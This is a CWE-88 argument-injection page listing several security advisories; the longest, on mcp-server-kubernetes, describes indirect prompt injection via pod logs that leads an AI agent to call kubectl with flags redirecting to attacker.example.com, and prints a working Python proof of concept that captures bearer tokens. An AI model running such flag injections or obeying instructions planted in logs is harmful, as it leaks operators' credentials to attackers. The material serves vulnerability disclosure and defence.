Common Weakness Enumeration

CWE-88

Allowed

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Abstraction: Base · Status: Draft

The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.

551 vulnerabilities reference this CWE, most recent first.

GHSA-6FGX-X7M2-74QM

Vulnerability from github – Published: 2025-10-13 20:19 – Updated: 2025-10-13 20:19
VLAI
Summary
tracexec has `env` command argument injection via environment variables starting with dash in traced exec events
Details

Impact

For tracexec's command line reconstruction feature, when a traced process executes another process with a environment variable where the key starts with a dash, tracexec incorrectly shows its commandline where such environment variables could cause argument injection for the env command. Such an injection is completely at the UI level unless the user tries to copy the command line with the injection and paste it into a terminal to execute it.

A minimal POC is executing env -- -a=b bash --norc in tracexec's TUI mode. The resulting command line of env executing bash would be env -a bash -a=b _=/usr/bin/env /usr/bin/bash --norc in tracexec's TUI, which injects -a=b into env's arguments.

This has very limited effect for security. A local adversarial could leverage this to make tracexec show an inaccurate reconstructed commandline for their executed command. If the user of tracexec decides to copy and run the reconstructed commandline, there could be injection for env's --block-signal, --default-signal, --ignore-signal, --split-string, --unset, --chdir, --argv0 arguments.

Patches

The fix is https://github.com/kxxt/tracexec/pull/118. Users are advised to upgrade to 0.14.0.

Workarounds

Don't blindly paste and execute commands copied from tracexec that contains environment variable where the key starts with a dash.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "tracexec"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-77",
      "CWE-88"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T20:19:36Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Impact\n\nFor tracexec\u0027s command line reconstruction feature, when a traced process executes another process with a environment variable where the key starts with a dash, tracexec incorrectly shows its commandline where such environment variables could cause argument injection for the `env` command.\nSuch an injection is completely at the UI level unless the user tries to copy the command line with the injection and paste it into a terminal to execute it.\n\nA minimal POC is executing `env -- -a=b bash --norc` in tracexec\u0027s TUI mode. The resulting command line of `env` executing bash would be `env -a bash -a=b  _=/usr/bin/env /usr/bin/bash --norc` in tracexec\u0027s TUI, which injects `-a=b` into `env`\u0027s arguments.\n\nThis has very limited effect for security.  A local adversarial could leverage this to make tracexec show an inaccurate reconstructed commandline for their executed command. If the user of tracexec decides to copy and run the reconstructed commandline,\nthere could be injection for `env`\u0027s `--block-signal`, `--default-signal`, `--ignore-signal`, `--split-string`, `--unset`, `--chdir`, `--argv0` arguments.\n\n### Patches\nThe fix is https://github.com/kxxt/tracexec/pull/118. Users are advised to upgrade to 0.14.0.\n\n### Workarounds\n\nDon\u0027t blindly paste and execute commands copied from tracexec that contains environment variable where the key starts with a dash.",
  "id": "GHSA-6fgx-x7m2-74qm",
  "modified": "2025-10-13T20:19:36Z",
  "published": "2025-10-13T20:19:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kxxt/tracexec/security/advisories/GHSA-6fgx-x7m2-74qm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kxxt/tracexec/pull/118"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kxxt/tracexec/commit/0dbe63214c8686df5bb62dbe6142cce27868ecff"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kxxt/tracexec"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "tracexec has `env` command argument injection via environment variables starting with dash in traced exec events"
}

GHSA-6FXP-67GH-J8MH

Vulnerability from github – Published: 2025-09-03 15:30 – Updated: 2025-09-03 15:30
VLAI
Details

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in CRESTRON TOUCHSCREENS x70 allows Argument Injection.This issue affects TOUCHSCREENS x70: from 3.001.0031.001 through 3.001.0034.001.

A specially crafted SCP command sent via SSH login string can lead a valid administrator user to gain Privileged Operating System access on the device.

Following Products Models are affected:

TSW-x70 TSW-x60 TST-1080 AM-3000/3100/3200 Soundbar VB70 HD-PS622/621/402 HD-TXU-RXU-4kZ-211 HD-MDNXM-4KZ-E

*Note: additional firmware updates will be published once made available

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-47421"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-03T14:15:45Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027) vulnerability in CRESTRON TOUCHSCREENS x70 allows Argument Injection.This issue affects TOUCHSCREENS x70: from 3.001.0031.001 through 3.001.0034.001.\n\nA specially crafted SCP command sent via SSH login string can lead a valid administrator user to gain Privileged Operating System access on the device.\n\n\nFollowing Products Models are affected:\n\nTSW-x70 \nTSW-x60 \nTST-1080\nAM-3000/3100/3200\nSoundbar VB70\nHD-PS622/621/402\nHD-TXU-RXU-4kZ-211\nHD-MDNXM-4KZ-E\n\n*Note: additional firmware updates will be published once made available",
  "id": "GHSA-6fxp-67gh-j8mh",
  "modified": "2025-09-03T15:30:34Z",
  "published": "2025-09-03T15:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47421"
    },
    {
      "type": "WEB",
      "url": "https://https://www.crestron.com/Software-Firmware/Firmware/Touchpanels/TS-770-TS-1070-TSS-770-TSS-1070-TSW-570/3-002-0040-001"
    },
    {
      "type": "WEB",
      "url": "https://https://www.crestron.com/release_notes/tsw-xx70_3.002.0040.001_release_notes.pdf"
    },
    {
      "type": "WEB",
      "url": "https://security.crestron.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6GGR-6XF8-P64W

Vulnerability from github – Published: 2022-10-12 12:00 – Updated: 2022-10-13 19:00
VLAI
Details

LibreOffice supports Office URI Schemes to enable browser integration of LibreOffice with MS SharePoint server. An additional scheme 'vnd.libreoffice.command' specific to LibreOffice was added. In the affected versions of LibreOffice links using that scheme could be constructed to call internal macros with arbitrary arguments. Which when clicked on, or activated by document events, could result in arbitrary script execution without warning. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.1; 7.3 versions prior to 7.3.6.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-3140"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-11T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "LibreOffice supports Office URI Schemes to enable browser integration of LibreOffice with MS SharePoint server. An additional scheme \u0027vnd.libreoffice.command\u0027 specific to LibreOffice was added. In the affected versions of LibreOffice links using that scheme could be constructed to call internal macros with arbitrary arguments. Which when clicked on, or activated by document events, could result in arbitrary script execution without warning. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.1; 7.3 versions prior to 7.3.6.",
  "id": "GHSA-6ggr-6xf8-p64w",
  "modified": "2022-10-13T19:00:20Z",
  "published": "2022-10-12T12:00:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3140"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00022.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TORANVTIWWBH3DNJR4UZATAG67KZOH32"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TORANVTIWWBH3DNJR4UZATAG67KZOH32"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202212-04"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5252"
    },
    {
      "type": "WEB",
      "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2022-3140"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6M4V-96F3-85PH

Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36
VLAI
Details

Xinuos (formerly SCO) Openserver v5 and v6 allows attackers to execute arbitrary commands via shell metacharacters in outputform or toclevels parameter to cgi-bin/printbook.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-25494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-18T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Xinuos (formerly SCO) Openserver v5 and v6 allows attackers to execute arbitrary commands via shell metacharacters in outputform or toclevels parameter to cgi-bin/printbook.",
  "id": "GHSA-6m4v-96f3-85ph",
  "modified": "2022-05-24T17:36:52Z",
  "published": "2022-05-24T17:36:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25494"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20OS%20Command%20Injection%20Vulnerability"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/160635/SCO-Openserver-5.0.7-Command-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6MX4-4H42-R8VH

Vulnerability from github – Published: 2026-06-05 15:40 – Updated: 2026-06-12 19:26
VLAI
Summary
MCP Server Kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration
Details

Summary

The kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account.

The token exfiltration mechanism was confirmed end-to-end with no cluster required. The full attack chain including indirect prompt injection via real pod logs was additionally confirmed using a live kind cluster and Claude Haiku (Anthropic API) as the agent.

Details

Vulnerable code

src/tools/kubectl-generic.ts, lines 103–118:

if (input.flags) {
  for (const [key, value] of Object.entries(input.flags)) {
    if (value === true) {
      cmdArgs.push(`--${key}`);
    } else if (value !== false && value !== null && value !== undefined) {
      cmdArgs.push(`--${key}=${value}`);   // ← no allowlist; any kubectl flag accepted
    }
  }
}

if (input.args && input.args.length > 0) {
  cmdArgs.push(...input.args);             // ← also unconstrained
}

Both the flags object and the args array are passed verbatim to execFileSync("kubectl", cmdArgs).

Why two flags are needed

kubectl deliberately suppresses Authorization: Bearer headers over plain HTTP connections (a safety feature against cleartext leakage). The attack therefore requires two flags together:

Flag Purpose
--server=https://attacker.com Redirects kubectl API calls to attacker's endpoint
--insecure-skip-tls-verify=true Allows attacker's self-signed cert; triggers credential sending

Both are standard kubectl debugging flags used when connecting to clusters with self-signed certificates, making the injection payload look plausible.

PoC

Step 1 - Static verification

# Confirm the flag loop has no allowlist:
grep -A 8 "for.*Object.entries.*flags" src/tools/kubectl-generic.ts

Expected output shows cmdArgs.push(--${key}=${value}) with no allowlist check.

Step 2 - kubectl behaviour test (confirms HTTPS required)

# Start a minimal HTTPS listener with a self-signed cert:
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/k.pem -out /tmp/c.pem \
  -subj "/CN=test" -days 1 2>/dev/null

python3 - <<'EOF'
import ssl, threading, json
from http.server import BaseHTTPRequestHandler, HTTPServer

class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        print(f"Authorization: {self.headers.get('authorization','<none>')}")
        self.send_response(401); self.end_headers()

srv = HTTPServer(("127.0.0.1", 19001), H)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("/tmp/c.pem", "/tmp/k.pem")
srv.socket = ctx.wrap_socket(srv.socket, server_side=True)
t = __import__("threading").Thread(target=srv.serve_forever, daemon=True); t.start()

import subprocess, time; time.sleep(0.3)
subprocess.run([
    "kubectl", "get", "pods",
    "--server=https://127.0.0.1:19001",
    "--token=MY-TEST-TOKEN-DOES-THIS-ARRIVE",
    "--insecure-skip-tls-verify=true"
], capture_output=True)
time.sleep(0.3)
EOF

Expected output:

Authorization: Bearer MY-TEST-TOKEN-DOES-THIS-ARRIVE

This confirms: kubectl sends the bearer token to any HTTPS endpoint when both flags are present.

Step 3 - Token exfiltration via MCP tool call

Prerequisites: Node.js 18+, Python 3.10+, openssl in PATH.

git clone https://github.com/Flux159/mcp-server-kubernetes
cd mcp-server-kubernetes
npm install && npm run build

Copy and run the following self-contained script from inside the repository:

#!/usr/bin/env python3
"""
PoC: kubectl_generic flag injection → bearer token exfiltration.
Run from inside the mcp-server-kubernetes repository after `npm run build`.
"""
import json, os, ssl, subprocess, sys, tempfile, threading, time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

KNOWN_TOKEN  = "EXFIL-CONFIRM-THIS-TOKEN-12345"
ATTACKER_PORT = 19001
captured = []

# ── Attacker HTTPS server ───────────────────────────────────────────
class Attacker(BaseHTTPRequestHandler):
    def log_message(self, *_): pass
    def _handle(self):
        auth = self.headers.get("authorization", "")
        if auth: captured.append(auth); print(f"  CAPTURED: {auth}", flush=True)
        body = b'{"code":401}'; self.send_response(401)
        self.send_header("Content-Length", str(len(body))); self.end_headers()
        self.wfile.write(body)
    def do_GET(self): self._handle()
    def do_POST(self): self._handle()

tmpdir = tempfile.mkdtemp()
cert, key = f"{tmpdir}/c.pem", f"{tmpdir}/k.pem"
subprocess.run(["openssl","req","-x509","-newkey","rsa:2048","-nodes",
    "-keyout",key,"-out",cert,"-subj","/CN=attacker","-days","1"],
    capture_output=True, check=True)
srv = ThreadingHTTPServer(("127.0.0.1", ATTACKER_PORT), Attacker)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER); ctx.load_cert_chain(cert, key)
srv.socket = ctx.wrap_socket(srv.socket, server_side=True)
threading.Thread(target=srv.serve_forever, daemon=True).start()

# ── Fake kubeconfig with known token ──────────────────────────────
kubeconfig = f"""apiVersion: v1
kind: Config
clusters:
- cluster:
    server: https://fake-cluster.internal:6443
    insecure-skip-tls-verify: true
  name: poc
contexts:
- context:
    cluster: poc
    user: poc-user
  name: poc
current-context: poc
users:
- name: poc-user
  user:
    token: {KNOWN_TOKEN}
"""

# ── Start mcp-server-kubernetes ────────────────────────────────────
proc = subprocess.Popen(
    ["node", "dist/index.js"],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    env={**os.environ, "KUBECONFIG_YAML": kubeconfig}
)
time.sleep(2)
if proc.poll() is not None:
    print("Server failed to start:", proc.stderr.read().decode()[:300]); sys.exit(1)

def send(msg):
    proc.stdin.write((json.dumps(msg)+"\n").encode()); proc.stdin.flush()

def recv(timeout=15):
    import time as _t; deadline = _t.time()+timeout
    while _t.time() < deadline:
        line = proc.stdout.readline()
        if line:
            try: return json.loads(line)
            except: pass
        time.sleep(0.05)

# MCP handshake
send({"jsonrpc":"2.0","id":1,"method":"initialize",
      "params":{"protocolVersion":"2024-11-05","capabilities":{},
                "clientInfo":{"name":"poc","version":"0"}}})
recv()
send({"jsonrpc":"2.0","method":"notifications/initialized","params":{}})
time.sleep(0.3)

# ── THE ATTACK CALL ────────────────────────────────────────────────
print(f"\nCalling kubectl_generic with --server=https://127.0.0.1:{ATTACKER_PORT}")
print("kubectl will send Authorization: Bearer to the attacker HTTPS server\n")

send({"jsonrpc":"2.0","id":2,"method":"tools/call",
      "params":{"name":"kubectl_generic",
                "arguments":{"command":"get","resourceType":"pods",
                             "flags":{"server":f"https://127.0.0.1:{ATTACKER_PORT}",
                                      "insecure-skip-tls-verify":"true"}}}})
recv(timeout=20)
time.sleep(1)
proc.terminate(); srv.shutdown()

# ── Result ─────────────────────────────────────────────────────────
print()
if any(KNOWN_TOKEN in c for c in captured):
    print("PASSED: bearer token exfiltrated via kubectl_generic flag injection")
    print(f"  Injected token: {KNOWN_TOKEN}")
    print(f"  Captured:       {captured[0]}")
else:
    print("NOT CONFIRMED - see output above")
    sys.exit(1)

Expected output:

Calling kubectl_generic with --server=https://127.0.0.1:19001
kubectl will send Authorization: Bearer to the attacker HTTPS server

  CAPTURED: Bearer EXFIL-CONFIRM-THIS-TOKEN-12345

PASSED: bearer token exfiltrated via kubectl_generic flag injection
  Injected token: EXFIL-CONFIRM-THIS-TOKEN-12345
  Captured:       Bearer EXFIL-CONFIRM-THIS-TOKEN-12345

Impact

What an attacker achieves: Privilege escalation within an environment where the attacker already has limited cluster or codebase access. The Kubernetes bearer token from the operator's kubeconfig is delivered to the attacker's HTTPS server on the first kubectl API discovery request. The token grants whatever RBAC the service account holds, in a typical cluster management deployment, this is broadly scoped. The attacker replays the captured token directly against the real Kubernetes API, independent of the MCP server.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "mcp-server-kubernetes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47250"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-05T15:40:00Z",
    "nvd_published_at": "2026-06-11T19:16:46Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `kubectl_generic` tool in `mcp-server-kubernetes` passes user-supplied flags directly to kubectl without any allowlist, enabling a **privilege escalation attack** within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application\u0027s log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, `kubectl_generic` is called with `--server=https://attacker.example.com` and `--insecure-skip-tls-verify=true`. kubectl sends all API requests,  including the `Authorization: Bearer \u003ctoken\u003e` header from the operator\u0027s kubeconfig to the attacker\u0027s endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator\u0027s service account.\n\nThe token exfiltration mechanism was confirmed end-to-end with no cluster required. The full attack chain including indirect prompt injection via real pod logs was additionally confirmed using a live kind cluster and Claude Haiku (Anthropic API) as the agent.\n\n\n### Details\n### Vulnerable code\n\n`src/tools/kubectl-generic.ts`, lines 103\u2013118:\n\n```typescript\nif (input.flags) {\n  for (const [key, value] of Object.entries(input.flags)) {\n    if (value === true) {\n      cmdArgs.push(`--${key}`);\n    } else if (value !== false \u0026\u0026 value !== null \u0026\u0026 value !== undefined) {\n      cmdArgs.push(`--${key}=${value}`);   // \u2190 no allowlist; any kubectl flag accepted\n    }\n  }\n}\n\nif (input.args \u0026\u0026 input.args.length \u003e 0) {\n  cmdArgs.push(...input.args);             // \u2190 also unconstrained\n}\n```\n\nBoth the `flags` object and the `args` array are passed verbatim to `execFileSync(\"kubectl\", cmdArgs)`.\n\n### Why two flags are needed\n\nkubectl deliberately suppresses `Authorization: Bearer` headers over plain HTTP connections (a safety feature against cleartext leakage). The attack therefore requires two flags together:\n\n| Flag | Purpose |\n|------|---------|\n| `--server=https://attacker.com` | Redirects kubectl API calls to attacker\u0027s endpoint |\n| `--insecure-skip-tls-verify=true` | Allows attacker\u0027s self-signed cert; triggers credential sending |\n\nBoth are standard kubectl debugging flags used when connecting to clusters with self-signed certificates, making the injection payload look plausible.\n\n### PoC\n### Step 1 - Static verification\n\n```bash\n# Confirm the flag loop has no allowlist:\ngrep -A 8 \"for.*Object.entries.*flags\" src/tools/kubectl-generic.ts\n```\n\nExpected output shows `cmdArgs.push(--${key}=${value})` with no allowlist check.\n\n### Step 2 - kubectl behaviour test (confirms HTTPS required)\n\n```bash\n# Start a minimal HTTPS listener with a self-signed cert:\nopenssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/k.pem -out /tmp/c.pem \\\n  -subj \"/CN=test\" -days 1 2\u003e/dev/null\n\npython3 - \u003c\u003c\u0027EOF\u0027\nimport ssl, threading, json\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass H(BaseHTTPRequestHandler):\n    def log_message(self, *a): pass\n    def do_GET(self):\n        print(f\"Authorization: {self.headers.get(\u0027authorization\u0027,\u0027\u003cnone\u003e\u0027)}\")\n        self.send_response(401); self.end_headers()\n\nsrv = HTTPServer((\"127.0.0.1\", 19001), H)\nctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\nctx.load_cert_chain(\"/tmp/c.pem\", \"/tmp/k.pem\")\nsrv.socket = ctx.wrap_socket(srv.socket, server_side=True)\nt = __import__(\"threading\").Thread(target=srv.serve_forever, daemon=True); t.start()\n\nimport subprocess, time; time.sleep(0.3)\nsubprocess.run([\n    \"kubectl\", \"get\", \"pods\",\n    \"--server=https://127.0.0.1:19001\",\n    \"--token=MY-TEST-TOKEN-DOES-THIS-ARRIVE\",\n    \"--insecure-skip-tls-verify=true\"\n], capture_output=True)\ntime.sleep(0.3)\nEOF\n```\n\nExpected output:\n```\nAuthorization: Bearer MY-TEST-TOKEN-DOES-THIS-ARRIVE\n```\n\nThis confirms: kubectl sends the bearer token to any HTTPS endpoint when both flags are present.\n\n### Step 3 - Token exfiltration via MCP tool call\n\n**Prerequisites:** Node.js 18+, Python 3.10+, `openssl` in PATH.\n\n```bash\ngit clone https://github.com/Flux159/mcp-server-kubernetes\ncd mcp-server-kubernetes\nnpm install \u0026\u0026 npm run build\n```\n\nCopy and run the following self-contained script from inside the repository:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC: kubectl_generic flag injection \u2192 bearer token exfiltration.\nRun from inside the mcp-server-kubernetes repository after `npm run build`.\n\"\"\"\nimport json, os, ssl, subprocess, sys, tempfile, threading, time\nfrom http.server import BaseHTTPRequestHandler, ThreadingHTTPServer\n\nKNOWN_TOKEN  = \"EXFIL-CONFIRM-THIS-TOKEN-12345\"\nATTACKER_PORT = 19001\ncaptured = []\n\n# \u2500\u2500 Attacker HTTPS server \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nclass Attacker(BaseHTTPRequestHandler):\n    def log_message(self, *_): pass\n    def _handle(self):\n        auth = self.headers.get(\"authorization\", \"\")\n        if auth: captured.append(auth); print(f\"  CAPTURED: {auth}\", flush=True)\n        body = b\u0027{\"code\":401}\u0027; self.send_response(401)\n        self.send_header(\"Content-Length\", str(len(body))); self.end_headers()\n        self.wfile.write(body)\n    def do_GET(self): self._handle()\n    def do_POST(self): self._handle()\n\ntmpdir = tempfile.mkdtemp()\ncert, key = f\"{tmpdir}/c.pem\", f\"{tmpdir}/k.pem\"\nsubprocess.run([\"openssl\",\"req\",\"-x509\",\"-newkey\",\"rsa:2048\",\"-nodes\",\n    \"-keyout\",key,\"-out\",cert,\"-subj\",\"/CN=attacker\",\"-days\",\"1\"],\n    capture_output=True, check=True)\nsrv = ThreadingHTTPServer((\"127.0.0.1\", ATTACKER_PORT), Attacker)\nctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER); ctx.load_cert_chain(cert, key)\nsrv.socket = ctx.wrap_socket(srv.socket, server_side=True)\nthreading.Thread(target=srv.serve_forever, daemon=True).start()\n\n# \u2500\u2500 Fake kubeconfig with known token \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nkubeconfig = f\"\"\"apiVersion: v1\nkind: Config\nclusters:\n- cluster:\n    server: https://fake-cluster.internal:6443\n    insecure-skip-tls-verify: true\n  name: poc\ncontexts:\n- context:\n    cluster: poc\n    user: poc-user\n  name: poc\ncurrent-context: poc\nusers:\n- name: poc-user\n  user:\n    token: {KNOWN_TOKEN}\n\"\"\"\n\n# \u2500\u2500 Start mcp-server-kubernetes \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nproc = subprocess.Popen(\n    [\"node\", \"dist/index.js\"],\n    stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n    env={**os.environ, \"KUBECONFIG_YAML\": kubeconfig}\n)\ntime.sleep(2)\nif proc.poll() is not None:\n    print(\"Server failed to start:\", proc.stderr.read().decode()[:300]); sys.exit(1)\n\ndef send(msg):\n    proc.stdin.write((json.dumps(msg)+\"\\n\").encode()); proc.stdin.flush()\n\ndef recv(timeout=15):\n    import time as _t; deadline = _t.time()+timeout\n    while _t.time() \u003c deadline:\n        line = proc.stdout.readline()\n        if line:\n            try: return json.loads(line)\n            except: pass\n        time.sleep(0.05)\n\n# MCP handshake\nsend({\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\n      \"params\":{\"protocolVersion\":\"2024-11-05\",\"capabilities\":{},\n                \"clientInfo\":{\"name\":\"poc\",\"version\":\"0\"}}})\nrecv()\nsend({\"jsonrpc\":\"2.0\",\"method\":\"notifications/initialized\",\"params\":{}})\ntime.sleep(0.3)\n\n# \u2500\u2500 THE ATTACK CALL \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprint(f\"\\nCalling kubectl_generic with --server=https://127.0.0.1:{ATTACKER_PORT}\")\nprint(\"kubectl will send Authorization: Bearer to the attacker HTTPS server\\n\")\n\nsend({\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\n      \"params\":{\"name\":\"kubectl_generic\",\n                \"arguments\":{\"command\":\"get\",\"resourceType\":\"pods\",\n                             \"flags\":{\"server\":f\"https://127.0.0.1:{ATTACKER_PORT}\",\n                                      \"insecure-skip-tls-verify\":\"true\"}}}})\nrecv(timeout=20)\ntime.sleep(1)\nproc.terminate(); srv.shutdown()\n\n# \u2500\u2500 Result \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprint()\nif any(KNOWN_TOKEN in c for c in captured):\n    print(\"PASSED: bearer token exfiltrated via kubectl_generic flag injection\")\n    print(f\"  Injected token: {KNOWN_TOKEN}\")\n    print(f\"  Captured:       {captured[0]}\")\nelse:\n    print(\"NOT CONFIRMED - see output above\")\n    sys.exit(1)\n```\n\nExpected output:\n```\nCalling kubectl_generic with --server=https://127.0.0.1:19001\nkubectl will send Authorization: Bearer to the attacker HTTPS server\n\n  CAPTURED: Bearer EXFIL-CONFIRM-THIS-TOKEN-12345\n\nPASSED: bearer token exfiltrated via kubectl_generic flag injection\n  Injected token: EXFIL-CONFIRM-THIS-TOKEN-12345\n  Captured:       Bearer EXFIL-CONFIRM-THIS-TOKEN-12345\n```\n\n### Impact\n**What an attacker achieves:** Privilege escalation within an environment where the attacker already has limited cluster or codebase access. The Kubernetes bearer token from the operator\u0027s kubeconfig is delivered to the attacker\u0027s HTTPS server on the first kubectl API discovery request. The token grants whatever RBAC the service account holds, in a typical cluster management deployment, this is broadly scoped. The attacker replays the captured token directly against the real Kubernetes API, independent of the MCP server.",
  "id": "GHSA-6mx4-4h42-r8vh",
  "modified": "2026-06-12T19:26:37Z",
  "published": "2026-06-05T15:40:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Flux159/mcp-server-kubernetes/security/advisories/GHSA-6mx4-4h42-r8vh"
    },
    {
      "type": "ADVISORY",
